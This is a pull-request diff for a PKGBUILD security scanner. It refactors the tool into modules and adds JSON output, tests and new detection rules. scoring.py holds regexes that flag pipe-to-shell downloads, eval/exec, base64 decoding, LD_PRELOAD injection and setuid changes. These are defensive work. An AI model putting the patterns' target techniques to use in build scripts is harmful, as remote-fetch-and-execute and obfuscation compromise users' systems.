### PR TITLE
feat: refactor into modules, add detection rules, tests, and output i…

### DIFF
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -41,6 +41,7 @@ repos:
         entry: mypy
         require_serial: true
         types: ["python"]
+        exclude: ^tests/
   # TOML
   - repo: https://github.com/pappasam/toml-sort
     rev: v0.24.2

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1,0 +1,64 @@
+# pkginspect
+
+PKGBUILD security analyzer for Arch Linux. Scores packages 0-100 using rule-based analysis.
+
+## Architecture
+
+After refactoring (see plan), the source layout is:
+
+```
+src/pkginspect/
+  cli.py        – argparse + main() orchestration
+  fetchers.py   – HTTP fetchers (AUR, official repos, generic URL)
+  scoring.py    – score_pkgbuild(), all detection regexes
+  rules.py      – load_rules(), RulesConfig dataclass
+  output.py     – text/JSON/color formatting
+  rules.yaml    – weights, caps, blockers config
+```
+
+Entry point: `pkginspect = "pkginspect.cli:main"` (defined in pyproject.toml).
+
+## Conventions
+
+- **Package manager**: `uv` (never pip/poetry). Run with `uv run pkginspect`.
+- **Formatting**: `ruff format` via pre-commit hook.
+- **Dependencies**: Keep minimal — only `requests` and `pyyaml` for core. Dev deps in `[dependency-groups] dev`.
+- **No ML code in main**: The ML pipeline (aurscraper, build_dataset, train_xgb) lives on a separate branch. Do not add pandas/xgboost/scikit-learn to core dependencies.
+- **Python**: >=3.8 compatibility (use `from __future__ import annotations`).
+
+## Scoring Engine
+
+- Starts at 100, applies negative penalties per finding.
+- Each category (integrity, transport, privilege, metadata, community, execution) has a cap (max penalty floor).
+- Blockers (sudo in build, writes outside $pkgdir) force score to 0.
+- Rules are configurable via `rules.yaml` (searched: CLI arg → env var → cwd → XDG_CONFIG_HOME → bundled).
+- Comment stripping: full-line comments are removed before risky-rule scanning to avoid false positives.
+
+## Detection Rules (current + planned)
+
+Existing: checksums, SKIP, weak hashes (md5/sha1 only), insecure URLs, git unpinned, curl/wget, sudo/pacman, privilege escalation, metadata fields, AUR community metrics.
+
+Planned additions (in priority order):
+1. Pipe-to-shell (`curl|sh`, `source <(curl...)`) — -30
+2. Base64/obfuscation decode — -25
+3. LD_PRELOAD injection — -20
+4. eval/exec, bash -c / sh -c — -15
+5. setuid/setgid bit manipulation — -10
+6. Predictable /tmp usage — -5
+
+## Testing
+
+Run: `uv run pytest`
+Fixtures in `tests/fixtures/` — clean, moderate, and malicious PKGBUILDs.
+
+## Workflow
+
+- One feature per branch, small PRs.
+- Verify manually after changes: `pkginspect --aur paru`, `pkginspect --official bash`.
+- Pre-commit hooks must pass (ruff-format, gitleaks, uv-lock).
+
+## Key Decisions
+
+- sha256 is NOT flagged as weak (only md5, sha1).
+- Focus on rule-based scoring; ML is deferred.
+- Personal tool shared with friends — keep it simple, no over-engineering.

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,9 +3,8 @@ build-backend = "uv_build"
 requires = ["uv_build<0.8"]
 
 [dependency-groups]
-lint = [
-  "pre-commit>=3.5.0"
-]
+dev = ["pytest>=7.0"]
+lint = ["pre-commit>=3.5.0"]
 type = [
   "mypy[faster-cache]>=1.14.1",
   "types-pyyaml>=6.0.12.20241230",
@@ -24,7 +23,11 @@ pkginspect = "pkginspect.cli:main"
 
 [tool.mypy]
 disallow_any_unimported = true
+exclude = ["tests/"]
 python_version = "3.13"
+
+[tool.pytest.ini_options]
+testpaths = ["tests"]
 
 [tool.uv]
 default-groups = [

--- a/src/pkginspect/cli.py
+++ b/src/pkginspect/cli.py
@@ -1,248 +1,17 @@
 #!/usr/bin/env python3
 
 from __future__ import annotations
-import argparse, os, pathlib, re, subprocess, sys, textwrap
-from collections import defaultdict
-from typing import List, Tuple, Dict
-import requests, yaml, importlib.resources as res
+
+import argparse
+import pathlib
+import sys
+
+from pkginspect.fetchers import aur_metadata, fetch_aur, fetch_official, fetch_url
+from pkginspect.output import format_json, format_text
+from pkginspect.rules import load_rules
+from pkginspect.scoring import score_pkgbuild
 
 
-# ── rule loader ──────────────────────────────────────────────────
-def load_rules(path_cli: str | None) -> dict:
-    search = []
-    if path_cli:
-        search.append(pathlib.Path(path_cli).expanduser())
-    if env := os.getenv("PKGINSPECT_RULES"):
-        search.append(pathlib.Path(env).expanduser())
-    search += [
-        pathlib.Path.cwd() / "rules.yaml",
-        pathlib.Path(os.getenv("XDG_CONFIG_HOME", pathlib.Path.home() / ".config"))
-        / "pkginspect"
-        / "rules.yaml",
-    ]
-    for p in search:
-        if p.is_file():
-            return yaml.safe_load(p.read_text())
-    with res.files("pkginspect").joinpath("rules.yaml").open(encoding="utf-8") as f:
-        return yaml.safe_load(f)
-
-
-W: Dict[str, int] = {}
-CAP: Dict[str, int] = {}
-BLOCK: Dict[str, bool] = {}
-
-# ── helpers & regexes ────────────────────────────────────────────
-HTTPS_OK = {
-    "github.com",
-    "gitlab.com",
-    "kernel.org",
-    "sourcehut.org",
-    "codeberg.org",
-    "archlinux.org",
-}
-CHECK_RE = re.compile(r"^\s*(sha(?:1|224|256|384|512)sums|md5sums|b2sums)\s*=", re.M)
-URL_RE = re.compile(r'(?:https?|ftp)://[^\s)\'"]+')
-CURL_RE = re.compile(r"\b(?:curl|wget)\b")
-SUDO_RE = re.compile(r"\b(?:sudo|pacman)\b")
-SETCAP_RE = re.compile(r"\b(setcap|chmod\s+777)\b")
-WRITE_CMD_RE = re.compile(
-    r"^\s*(?:install|cp|mv|mkdir|ln|echo|cat)\s+[^\n]*\s/(?:etc|usr|var|lib|bin)/", re.M
-)
-
-
-def domain(url: str) -> str:
-    return url.split("/")[2].lower()
-
-
-def namcap_errors(p: pathlib.Path | None):
-    if p is None:
-        return None
-    try:
-        o = subprocess.run(["namcap", "-i", str(p)], capture_output=True, text=True)
-        return o.stdout.count("ERROR")
-    except FileNotFoundError:
-        return None
-
-
-def score_pkgbuild(
-    lines: List[str],
-    *,
-    local_path: pathlib.Path | None = None,
-    aur_meta: dict | None = None,
-) -> Tuple[int, List[Tuple[int, str]], Dict[str, int]]:
-    print("*" * 80)
-    print(aur_meta)
-
-    score = 100
-    cat = defaultdict(int)
-    msgs: List[Tuple[int, str]] = []
-    txt = "\n".join(lines)
-
-    def note(penalty: int, message: str, bucket: str):
-        cat[bucket] += penalty
-        msgs.append((penalty, message))
-
-    # Integrity
-    sums_arrays = [m.group(1) for l in lines if (m := CHECK_RE.match(l))]
-    if not sums_arrays:
-        note(W["missing_checksums"], "No checksum array", "integrity")
-    if re.search(
-        r"^\s*(?:sha(?:1|224|256|384|512)|md5|b2)sums\s*=\s*\([\s\S]*?\bSKIP\b",
-        txt,
-        re.M,
-    ):
-        total = len(re.findall(r'^\s*["\']?https?://', txt, re.M))
-        skipped = len(re.findall(r"\bSKIP\b", txt))
-        penalty = (
-            W["skip_checksum_all"] if skipped == total else W["skip_checksum_some"]
-        )
-        note(penalty, "SKIP used in checksums", "integrity")
-    if {"md5sums", "sha256sums"} & set(sums_arrays):
-        note(W["weak_hash"], "Weak hash", "integrity")
-
-    # Transport
-    for url in URL_RE.findall(txt):
-        if url.startswith(("http://", "ftp://")):
-            note(W["insecure_url"], f"Insecure URL {url}", "transport")
-    if "git+https" in txt and not re.search(r"#\w*tag|\bcommit=", txt):
-        note(W["git_unpinned"], "Git source unpinned", "transport")
-
-    # Privilege / networking
-    if CURL_RE.search(txt):
-        note(W["network_fetch"], "Network fetch in build", "privilege")
-    uses_sudo = bool(SUDO_RE.search(txt))
-    if uses_sudo:
-        note(W["sudo_or_pacman"], "Uses sudo/pacman", "privilege")
-    pkg_body = re.search(r"package\(\)\s*\{([\s\S]*?)^\}", txt, re.M)
-    writes = bool(pkg_body and WRITE_CMD_RE.search(pkg_body.group(1)))
-    if writes:
-        note(W["privilege_escal"], "Writes outside $pkgdir", "privilege")
-    if SETCAP_RE.search(txt):
-        note(W["privilege_escal"], "Potential privilege escalation", "privilege")
-
-    if (BLOCK.get("uses_sudo") and uses_sudo) or (
-        BLOCK.get("writes_outside_pkgdir") and writes
-    ):
-        msgs.append((0, "Fatal rule: privileged operation"))
-        return 0, msgs, cat
-
-    # Metadata absence
-    if not any(l.startswith("license=(") for l in lines):
-        note(W["no_license"], "No license field", "metadata")
-    if not any(l.startswith("arch=(") for l in lines):
-        note(W["no_arch_field"], "No arch field", "metadata")
-    if not any(l.startswith("# Maintainer:") for l in lines):
-        note(W["no_maintainer_tag"], "No maintainer tag", "metadata")
-    if e := namcap_errors(local_path):
-        note(W["namcap_error"] * e, f"namcap {e} error(s)", "metadata")
-
-    if aur_meta:
-        votes = aur_meta.get("NumVotes", 0)
-        maint = aur_meta.get("Maintainer")
-        ood = aur_meta.get("OutOfDate") not in (0, None)
-
-        # vote-based tiers
-        if votes < 1:
-            note(W["aur_low_votes_3"], f"Only {votes} votes", "community")
-        elif votes < 15:
-            note(W["aur_low_votes_2"], f"Only {votes} votes", "community")
-        elif votes < 30:
-            note(W["aur_low_votes_1"], f"Only {votes} votes", "community")
-
-        # orphaned?
-        if maint in (None, "", "orphan"):
-            note(W["aur_orphaned"], "Package is orphaned", "community")
-
-        # out-of-date?
-        if ood:
-            # aur returns epoch timestamp; convert once for readability
-            age_days = int((time.time() - aur_meta["OutOfDate"]) / 86400)
-            note(
-                W["aur_out_of_date"],
-                f"Flagged out of date ({age_days} days)",
-                "community",
-            )
-
-    # Apply caps
-    for k, v in cat.items():
-        cap = CAP.get(k)
-        if cap is not None and v < cap:
-            cat[k] = cap
-    score += sum(cat.values())
-    return max(0, score), msgs, cat
-
-
-# ── fetchers  ─────────────────────────────────────────────────────
-# ── helper: fetch AUR JSON once per run ─────────────────────────
-def aur_metadata(pkg: str) -> dict:
-    url = (
-        "https://aur.archlinux.org/rpc/?v=5&type=info&arg[]=" + pkg
-    )  # will need to update when AUR moves to v6
-    try:
-        r = requests.get(url, timeout=10)
-        r.raise_for_status()
-        data = r.json()
-        if data.get("resultcount") == 1:
-            return data["results"][0]
-    except Exception:
-        pass
-    return {}
-
-
-# ── 1. generic fetch with HTML-guard ──────────────────────────────
-def fetch_url(url: str) -> List[str]:
-    """Return the remote text split into lines; raise if we get HTML."""
-    r = requests.get(url, timeout=10)
-    r.raise_for_status()  # 4xx / 5xx ⇒ exception
-    txt = r.text.lstrip()
-    if txt.startswith("<!DOCTYPE html"):  # GitLab login page, Cloudflare, etc.
-        raise RuntimeError("HTML page returned instead of raw file")
-    return txt.splitlines()
-
-
-# ── 2. fetch from AUR (always public) ────────────────────────────
-def fetch_aur(pkg: str) -> List[str]:
-    return fetch_url(f"https://aur.archlinux.org/cgit/aur.git/plain/PKGBUILD?h={pkg}")
-
-
-# ── 3. fetch from the official repos with graceful fallbacks ─────
-def fetch_official(pkg: str) -> List[str]:
-    """
-    1. Try Arch GitLab (needs SSO but still public for some repos)
-    2. Fall back to GitHub mirrors: core → extra → community → multilib
-    3. If still missing, raise OfficialNotFound so caller can suggest --aur
-    """
-    # 3a. Arch GitLab
-    gl_url = (
-        "https://gitlab.archlinux.org/archlinux/packaging/packages/"
-        f"{pkg}/-/raw/main/PKGBUILD?inline=false"
-    )
-    try:
-        return fetch_url(gl_url)
-    except Exception:  # HTML login page or 404
-        pass
-
-    # 3b. GitHub mirrors
-    gh_roots = [
-        "archlinux/svntogit-core",
-        "archlinux/svntogit-extra",
-        "archlinux/svntogit-community",
-        "archlinux/svntogit-multilib",
-    ]
-    for root in gh_roots:
-        gh_url = (
-            f"https://raw.githubusercontent.com/{root}/packages/{pkg}/trunk/PKGBUILD"
-        )
-        try:
-            return fetch_url(gh_url)
-        except Exception:
-            continue  # try next mirror
-
-    # 3c. Not found anywhere → tell caller to hint at --aur
-    raise RuntimeError("not found in official mirrors")
-
-
-# ── CLI ──────────────────────────────────────────────────────────────────────
 def main() -> None:
     ap = argparse.ArgumentParser(description="PKGBUILD analyzer")
     g = ap.add_mutually_exclusive_group(required=True)
@@ -251,12 +20,11 @@ def main() -> None:
     g.add_argument("--official")
     g.add_argument("--url")
     ap.add_argument("--rules")
+    ap.add_argument("--json", action="store_true", help="output as JSON")
     ap.add_argument("-d", "--debug", action="store_true")
     args = ap.parse_args()
 
-    global W, CAP, BLOCK
-    r = load_rules(args.rules)
-    W, CAP, BLOCK = r["weights"], r["caps"], r["blockers"]
+    config = load_rules(args.rules)
 
     if args.file:
         p = pathlib.Path(args.file)
@@ -279,41 +47,28 @@ def main() -> None:
     else:
         lines, loc = fetch_url(args.url), None
 
+    aur_meta = {}
     if args.aur:
         aur_meta = aur_metadata(args.aur)
         if args.debug:
             print("DEBUG: AUR meta:", aur_meta or "none")
+
+    result = score_pkgbuild(lines, config=config, local_path=loc, aur_meta=aur_meta)
+
+    if args.json:
+        source = (
+            "aur"
+            if args.aur
+            else "official"
+            if args.official
+            else "file"
+            if args.file
+            else "url"
+        )
+        pkg = args.aur or args.official or args.file or args.url
+        print(format_json(result, source=source, package=pkg))
     else:
-        aur_meta = {}
-
-    score, msgs, cats = score_pkgbuild(lines, local_path=loc, aur_meta=aur_meta)
-
-    # sort by biggest absolute deduction
-    msgs_sorted = sorted(msgs, key=lambda t: abs(t[0]), reverse=True)
-    biggest = msgs_sorted[0][1] + f" ({msgs_sorted[0][0]})" if msgs_sorted else "None"
-
-    badge, grade = (
-        ("🟢", "Excellent")
-        if score >= 90
-        else ("🟡", "Good")
-        if score >= 70
-        else ("🟠", "Fair")
-        if score >= 50
-        else ("🔴", "Poor")
-    )
-
-    if args.debug:
-        print("\n─── PKGBUILD analysed ───")
-        print(textwrap.indent("\n".join(lines), "  "))
-        print("\n─── Category totals ───")
-        for k, v in cats.items():
-            print(f"  {k:10}: {v:+}")
-        print()
-
-    print(f"{badge}  PKGBUILD safety score: {score}/100  →  {grade}")
-    print(f"Biggest flaw: {biggest}\n")
-    for score, msg in msgs_sorted:
-        print(f"- {msg} ({score})")
+        print(format_text(result, lines=lines, debug=args.debug))
 
 
 if __name__ == "__main__":

--- a/src/pkginspect/fetchers.py
+++ b/src/pkginspect/fetchers.py
@@ -1,0 +1,78 @@
+from __future__ import annotations
+
+from typing import List
+
+import requests
+
+HTTPS_OK = {
+    "github.com",
+    "gitlab.com",
+    "kernel.org",
+    "sourcehut.org",
+    "codeberg.org",
+    "archlinux.org",
+}
+
+
+def domain(url: str) -> str:
+    return url.split("/")[2].lower()
+
+
+def aur_metadata(pkg: str) -> dict:
+    url = "https://aur.archlinux.org/rpc/?v=5&type=info&arg[]=" + pkg
+    try:
+        r = requests.get(url, timeout=10)
+        r.raise_for_status()
+        data = r.json()
+        if data.get("resultcount") == 1:
+            return data["results"][0]
+    except Exception:
+        pass
+    return {}
+
+
+def fetch_url(url: str) -> List[str]:
+    """Return the remote text split into lines; raise if we get HTML."""
+    r = requests.get(url, timeout=10)
+    r.raise_for_status()
+    txt = r.text.lstrip()
+    if txt.startswith("<!DOCTYPE html"):
+        raise RuntimeError("HTML page returned instead of raw file")
+    return txt.splitlines()
+
+
+def fetch_aur(pkg: str) -> List[str]:
+    return fetch_url(f"https://aur.archlinux.org/cgit/aur.git/plain/PKGBUILD?h={pkg}")
+
+
+def fetch_official(pkg: str) -> List[str]:
+    """
+    1. Try Arch GitLab (needs SSO but still public for some repos)
+    2. Fall back to GitHub mirrors: core -> extra -> community -> multilib
+    3. If still missing, raise RuntimeError so caller can suggest --aur
+    """
+    gl_url = (
+        "https://gitlab.archlinux.org/archlinux/packaging/packages/"
+        f"{pkg}/-/raw/main/PKGBUILD?inline=false"
+    )
+    try:
+        return fetch_url(gl_url)
+    except Exception:
+        pass
+
+    gh_roots = [
+        "archlinux/svntogit-core",
+        "archlinux/svntogit-extra",
+        "archlinux/svntogit-community",
+        "archlinux/svntogit-multilib",
+    ]
+    for root in gh_roots:
+        gh_url = (
+            f"https://raw.githubusercontent.com/{root}/packages/{pkg}/trunk/PKGBUILD"
+        )
+        try:
+            return fetch_url(gh_url)
+        except Exception:
+            continue
+
+    raise RuntimeError("not found in official mirrors")

--- a/src/pkginspect/output.py
+++ b/src/pkginspect/output.py
@@ -1,0 +1,127 @@
+from __future__ import annotations
+
+import json
+import os
+import sys
+import textwrap
+from typing import Any, List
+
+from pkginspect.scoring import ScoringResult
+
+
+def _use_color() -> bool:
+    if os.getenv("NO_COLOR"):
+        return False
+    return sys.stdout.isatty()
+
+
+# ANSI escape helpers
+_RESET = "\033[0m"
+_BOLD = "\033[1m"
+_RED = "\033[31m"
+_GREEN = "\033[32m"
+_YELLOW = "\033[33m"
+_CYAN = "\033[36m"
+
+
+def _c(text: str, code: str) -> str:
+    if not _use_color():
+        return text
+    return f"{code}{text}{_RESET}"
+
+
+def grade(score: int) -> tuple[str, str]:
+    if score >= 90:
+        return "\U0001f7e2", "Excellent"
+    if score >= 70:
+        return "\U0001f7e1", "Good"
+    if score >= 50:
+        return "\U0001f7e0", "Fair"
+    return "\U0001f534", "Poor"
+
+
+def _score_color(score: int) -> str:
+    if score >= 90:
+        return _GREEN
+    if score >= 70:
+        return _YELLOW
+    if score >= 50:
+        return _YELLOW
+    return _RED
+
+
+def format_text(
+    result: ScoringResult,
+    *,
+    lines: List[str] | None = None,
+    debug: bool = False,
+    rules_path: str | None = None,
+) -> str:
+    parts: list[str] = []
+    color = _use_color()
+
+    sorted_findings = sorted(
+        result.findings, key=lambda f: abs(f.penalty), reverse=True
+    )
+    biggest = (
+        f"{sorted_findings[0].message} ({sorted_findings[0].penalty})"
+        if sorted_findings
+        else "None"
+    )
+
+    badge, label = grade(result.score)
+    sc = _score_color(result.score)
+
+    if debug:
+        if rules_path:
+            parts.append(_c(f"Rules: {rules_path}", _CYAN))
+        if lines is not None:
+            parts.append(
+                "\n"
+                + _c("\u2500\u2500\u2500 PKGBUILD analysed \u2500\u2500\u2500", _BOLD)
+            )
+            parts.append(textwrap.indent("\n".join(lines), "  "))
+        parts.append(
+            "\n" + _c("\u2500\u2500\u2500 Category totals \u2500\u2500\u2500", _BOLD)
+        )
+        for k, v in result.categories.items():
+            parts.append(f"  {k:12}: {_c(f'{v:+}', _RED)}")
+        parts.append("")
+
+    score_text = f"{result.score}/100"
+    if color:
+        score_text = _c(score_text, sc + _BOLD)
+    parts.append(f"{badge}  PKGBUILD safety score: {score_text}  \u2192  {label}")
+    parts.append(f"Biggest flaw: {biggest}\n")
+    for f in sorted_findings:
+        penalty_str = f"({f.penalty})"
+        if color:
+            penalty_str = _c(penalty_str, _RED)
+        parts.append(f"- {f.message} {penalty_str}")
+
+    return "\n".join(parts)
+
+
+def format_json(
+    result: ScoringResult,
+    *,
+    source: str | None = None,
+    package: str | None = None,
+) -> str:
+    _, label = grade(result.score)
+    data: dict[str, Any] = {
+        "score": result.score,
+        "grade": label,
+        "findings": [
+            {
+                "penalty": f.penalty,
+                "message": f.message,
+                "category": f.category,
+            }
+            for f in sorted(result.findings, key=lambda f: abs(f.penalty), reverse=True)
+        ],
+        "categories": result.categories,
+    }
+    if source or package:
+        data["meta"] = {"source": source, "package": package}
+    return json.dumps(data, indent=2)

--- a/src/pkginspect/rules.py
+++ b/src/pkginspect/rules.py
@@ -1,0 +1,36 @@
+from __future__ import annotations
+
+import dataclasses
+import os
+import pathlib
+
+import importlib.resources as res
+import yaml
+
+
+@dataclasses.dataclass
+class RulesConfig:
+    weights: dict[str, int]
+    caps: dict[str, int]
+    blockers: dict[str, bool]
+
+
+def load_rules(path_cli: str | None = None) -> RulesConfig:
+    search: list[pathlib.Path] = []
+    if path_cli:
+        search.append(pathlib.Path(path_cli).expanduser())
+    if env := os.getenv("PKGINSPECT_RULES"):
+        search.append(pathlib.Path(env).expanduser())
+    search += [
+        pathlib.Path.cwd() / "rules.yaml",
+        pathlib.Path(os.getenv("XDG_CONFIG_HOME", pathlib.Path.home() / ".config"))
+        / "pkginspect"
+        / "rules.yaml",
+    ]
+    for p in search:
+        if p.is_file():
+            raw = yaml.safe_load(p.read_text())
+            return RulesConfig(raw["weights"], raw["caps"], raw["blockers"])
+    with res.files("pkginspect").joinpath("rules.yaml").open(encoding="utf-8") as f:
+        raw = yaml.safe_load(f)
+    return RulesConfig(raw["weights"], raw["caps"], raw["blockers"])

--- a/src/pkginspect/rules.yaml
+++ b/src/pkginspect/rules.yaml
@@ -3,14 +3,20 @@ weights:
   missing_checksums:   -30
   skip_checksum_some:  -30   # at least one SKIP
   skip_checksum_all:   -50   # every source is SKIP
-  weak_hash:           -5    # md5 or sha256 instead of sha512/b2
+  weak_hash:           -5    # md5 or sha1 only
   # Transport
   insecure_url:        -10
   git_unpinned:        -10
+  # Execution (dangerous patterns)
+  pipe_to_shell:       -30   # curl|sh, source <(curl ...)
+  eval_exec:           -15   # eval, exec, bash -c
+  obfuscation:         -25   # base64 --decode, xxd -r
+  ld_preload:          -20   # LD_PRELOAD= / LD_LIBRARY_PATH=
   # Privilege / build networking
   network_fetch:       -15
   sudo_or_pacman:      -25
   privilege_escal:     -10
+  setuid_bit:          -10   # chmod u+s, chmod 4755, setcap
   # Metadata absence
   no_license:          -3
   no_arch_field:       -2
@@ -28,6 +34,7 @@ weights:
 caps:
   integrity:  -50
   transport:  -30
+  execution:  -50
   privilege:  -40
   metadata:   -25
   community:  -20

--- a/src/pkginspect/scoring.py
+++ b/src/pkginspect/scoring.py
@@ -1,0 +1,224 @@
+from __future__ import annotations
+
+import dataclasses
+import pathlib
+import re
+import subprocess
+import time
+from collections import defaultdict
+from typing import List, Tuple
+
+from pkginspect.rules import RulesConfig
+
+# ── regexes ──────────────────────────────────────────────────────
+# Matches sha256sums=, sha256sums_x86_64=, b2sums_aarch64=, etc.
+CHECK_RE = re.compile(
+    r"^\s*(sha(?:1|224|256|384|512)sums|md5sums|b2sums)(?:_\w+)?\s*=", re.M
+)
+URL_RE = re.compile(r'(?:https?|ftp)://[^\s)\'"]+')
+CURL_RE = re.compile(r"\b(?:curl|wget)\b")
+SUDO_RE = re.compile(r"\bsudo\b")
+# Only flag pacman when doing write operations (-S install, -U upgrade, -R remove, -D modify)
+# -T (deptest) and -Q (query) are read-only and legitimate in PKGBUILDs
+PACMAN_WRITE_RE = re.compile(r"\bpacman\s+(?:[^\n]*\s)?-[SURDsurd]\b", re.M)
+SETCAP_RE = re.compile(
+    r"\b(?:setcap|chmod\s+[2467][0-7]{3}|chmod\s+[ugo]*\+s|chmod\s+777)\b",
+    re.M,
+)
+WRITE_CMD_RE = re.compile(
+    r"^\s*(?:install|cp|mv|mkdir|ln|echo|cat|sed|dd|tee|patch|rm)"
+    r"\s+[^\n]*\s/(?:etc|usr|var|lib|bin)/",
+    re.M,
+)
+
+# New detection patterns
+PIPE_SHELL_RE = re.compile(
+    r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b"
+    r"|\bsource\s+<\(\s*(?:curl|wget)\b"
+    r"|\b(?:ba)?sh\s+<\(\s*(?:curl|wget)\b",
+    re.M,
+)
+EVAL_RE = re.compile(r"\b(?:eval|exec)\s+", re.M)
+BASH_C_RE = re.compile(r"\b(?:ba)?sh\s+-c\s+", re.M)
+OBFUSCATION_RE = re.compile(r"\bbase64\s+(?:-d|--decode)\b|\bxxd\s+-r\b", re.M)
+LD_PRELOAD_RE = re.compile(r"\bLD_PRELOAD\s*=|\bLD_LIBRARY_PATH\s*=", re.M)
+
+
+@dataclasses.dataclass
+class Finding:
+    penalty: int
+    message: str
+    category: str
+
+
+@dataclasses.dataclass
+class ScoringResult:
+    score: int
+    findings: List[Finding]
+    categories: dict[str, int]
+
+
+def extract_array(name: str, txt: str) -> str:
+    """Extract contents of a bash array like source=(...)."""
+    m = re.search(rf"^\s*{name}\s*=\s*\((.*?)\)", txt, re.M | re.S)
+    return m.group(1) if m else ""
+
+
+def extract_package_bodies(txt: str) -> list[str]:
+    """Extract all package() and package_*() function bodies using brace counting."""
+    bodies = []
+    for m in re.finditer(r"package(?:_\w+)?\(\)\s*\{", txt):
+        start = m.end()
+        depth = 1
+        i = start
+        while i < len(txt) and depth > 0:
+            if txt[i] == "{":
+                depth += 1
+            elif txt[i] == "}":
+                depth -= 1
+            i += 1
+        bodies.append(txt[start : i - 1])
+    return bodies
+
+
+def namcap_errors(p: pathlib.Path | None) -> int | None:
+    if p is None:
+        return None
+    try:
+        o = subprocess.run(["namcap", "-i", str(p)], capture_output=True, text=True)
+        return o.stdout.count("ERROR")
+    except FileNotFoundError:
+        return None
+
+
+def score_pkgbuild(
+    lines: List[str],
+    *,
+    config: RulesConfig,
+    local_path: pathlib.Path | None = None,
+    aur_meta: dict | None = None,
+) -> ScoringResult:
+    W = config.weights
+    CAP = config.caps
+    BLOCK = config.blockers
+
+    score = 100
+    cat: dict[str, int] = defaultdict(int)
+    findings: List[Finding] = []
+
+    # Remove full-line comments for risky-rule scans
+    lines_nc = [l for l in lines if not l.lstrip().startswith("#")]
+    txt = "\n".join(lines_nc)
+
+    def note(penalty: int, message: str, bucket: str) -> None:
+        cat[bucket] += penalty
+        findings.append(Finding(penalty, message, bucket))
+
+    # Integrity ----
+    sums_arrays = [m.group(1) for l in lines if (m := CHECK_RE.match(l))]
+    if not sums_arrays:
+        note(W["missing_checksums"], "No checksum array", "integrity")
+
+    if re.search(
+        r"^\s*(?:sha(?:1|224|256|384|512)|md5|b2)sums(?:_\w+)?\s*=\s*\([\s\S]*?\bSKIP\b",
+        txt,
+        re.M,
+    ):
+        total = len(re.findall(r'^\s*["\']?https?://', txt, re.M))
+        skipped = len(re.findall(r"\bSKIP\b", txt))
+        penalty = (
+            W["skip_checksum_all"] if skipped == total else W["skip_checksum_some"]
+        )
+        note(penalty, "SKIP used in checksums", "integrity")
+    if any(s.startswith(("md5sums", "sha1sums")) for s in sums_arrays):
+        note(W["weak_hash"], "Weak hash (md5/sha1)", "integrity")
+
+    # Transport ----
+    source_txt = extract_array("source", txt)
+    for url in URL_RE.findall(txt):
+        if url.startswith(("http://", "ftp://")):
+            note(W["insecure_url"], f"Insecure URL {url}", "transport")
+    if "git+https" in source_txt and not re.search(r"#\w*tag|\bcommit=", source_txt):
+        note(W["git_unpinned"], "Git source unpinned", "transport")
+
+    # Execution ----
+    if PIPE_SHELL_RE.search(txt):
+        note(W["pipe_to_shell"], "Pipe to shell (curl|sh)", "execution")
+    if EVAL_RE.search(txt):
+        note(W["eval_exec"], "eval/exec detected (review manually)", "execution")
+    if BASH_C_RE.search(txt):
+        note(W["eval_exec"], "sh -c / bash -c detected", "execution")
+    if OBFUSCATION_RE.search(txt):
+        note(W["obfuscation"], "Base64/binary decode detected", "execution")
+    if LD_PRELOAD_RE.search(txt):
+        note(W["ld_preload"], "LD_PRELOAD/LD_LIBRARY_PATH manipulation", "execution")
+
+    # Privilege / networking ----
+    if CURL_RE.search(txt):
+        note(W["network_fetch"], "Network fetch in build", "privilege")
+    uses_sudo = bool(SUDO_RE.search(txt) or PACMAN_WRITE_RE.search(txt))
+    if SUDO_RE.search(txt):
+        note(W["sudo_or_pacman"], "Uses sudo", "privilege")
+    if PACMAN_WRITE_RE.search(txt):
+        note(
+            W["sudo_or_pacman"], "Calls pacman to install/remove packages", "privilege"
+        )
+    pkg_bodies = extract_package_bodies(txt)
+    pkg_text = "\n".join(pkg_bodies)
+    writes = bool(pkg_bodies and WRITE_CMD_RE.search(pkg_text))
+    if writes:
+        note(W["privilege_escal"], "Writes outside $pkgdir", "privilege")
+    if SETCAP_RE.search(txt):
+        note(
+            W["setuid_bit"],
+            "Potential privilege escalation (setuid/setcap)",
+            "privilege",
+        )
+
+    if (BLOCK.get("uses_sudo") and uses_sudo) or (
+        BLOCK.get("writes_outside_pkgdir") and writes
+    ):
+        findings.append(Finding(0, "Fatal rule: privileged operation", "privilege"))
+        return ScoringResult(0, findings, dict(cat))
+
+    # Metadata absence ----
+    if not any(l.startswith("license=(") for l in lines):
+        note(W["no_license"], "No license field", "metadata")
+    if not any(l.startswith("arch=(") for l in lines):
+        note(W["no_arch_field"], "No arch field", "metadata")
+    if not any(l.startswith("# Maintainer:") for l in lines):
+        note(W["no_maintainer_tag"], "No maintainer tag", "metadata")
+    if e := namcap_errors(local_path):
+        note(W["namcap_error"] * e, f"namcap {e} error(s)", "metadata")
+
+    # Community / AUR ----
+    if aur_meta:
+        votes = aur_meta.get("NumVotes", 0)
+        maint = aur_meta.get("Maintainer")
+        ood = aur_meta.get("OutOfDate") not in (0, None)
+
+        if votes < 1:
+            note(W["aur_low_votes_3"], f"Only {votes} votes", "community")
+        elif votes < 15:
+            note(W["aur_low_votes_2"], f"Only {votes} votes", "community")
+        elif votes < 30:
+            note(W["aur_low_votes_1"], f"Only {votes} votes", "community")
+
+        if maint in (None, "", "orphan"):
+            note(W["aur_orphaned"], "Package is orphaned", "community")
+
+        if ood:
+            age_days = int((time.time() - aur_meta["OutOfDate"]) / 86400)
+            note(
+                W["aur_out_of_date"],
+                f"Flagged out of date ({age_days} days)",
+                "community",
+            )
+
+    # Apply caps ----
+    for k, v in cat.items():
+        cap = CAP.get(k)
+        if cap is not None and v < cap:
+            cat[k] = cap
+    score += sum(cat.values())
+    return ScoringResult(max(0, score), findings, dict(cat))

--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -1,0 +1,26 @@
+from __future__ import annotations
+
+import pathlib
+
+import pytest
+
+FIXTURES = pathlib.Path(__file__).parent / "fixtures"
+
+
+def load_fixture(name: str) -> list[str]:
+    return (FIXTURES / name).read_text().splitlines()
+
+
+@pytest.fixture
+def clean_lines():
+    return load_fixture("clean.PKGBUILD")
+
+
+@pytest.fixture
+def moderate_lines():
+    return load_fixture("moderate.PKGBUILD")
+
+
+@pytest.fixture
+def malicious_lines():
+    return load_fixture("malicious.PKGBUILD")

--- a/tests/fixtures/clean.PKGBUILD
+++ b/tests/fixtures/clean.PKGBUILD
@@ -1,0 +1,19 @@
